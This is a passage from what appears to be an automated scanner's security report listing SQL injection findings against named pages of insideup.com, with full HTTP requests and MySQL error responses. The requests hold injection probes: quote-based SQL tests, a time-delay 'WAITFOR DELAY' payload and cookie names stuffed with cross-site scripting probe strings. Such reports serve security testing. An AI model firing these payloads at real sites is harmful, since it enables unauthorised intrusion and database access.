OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:35:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rkq8ad6mrnc4j174rr26gdo203; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project_dynamic_page_updated.php was not found on this server.</p>

1.427. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1foakm9eejrg79pmuisogd3812; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3'' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&templ' at line 5

Request 2

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=serre8t2r25v6cjdiot0hbedk6; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project_dynamic_page_updated.php was not found on this server.</p>

1.428. http://www.insideup.com/ppc/leadflow/inco00/leadflow/inco00/project.php [ca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/leadflow/inco00/project.php

Issue detail

The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?ca' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:51:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=81s3n7s3djjq2dfj4di0njfe22; path=/
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?ca'' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/inco00/leadflow/inco00/project.php?ca'/'
   union select prj.catId,prj.gr' at line 5

Request 2

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?ca'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 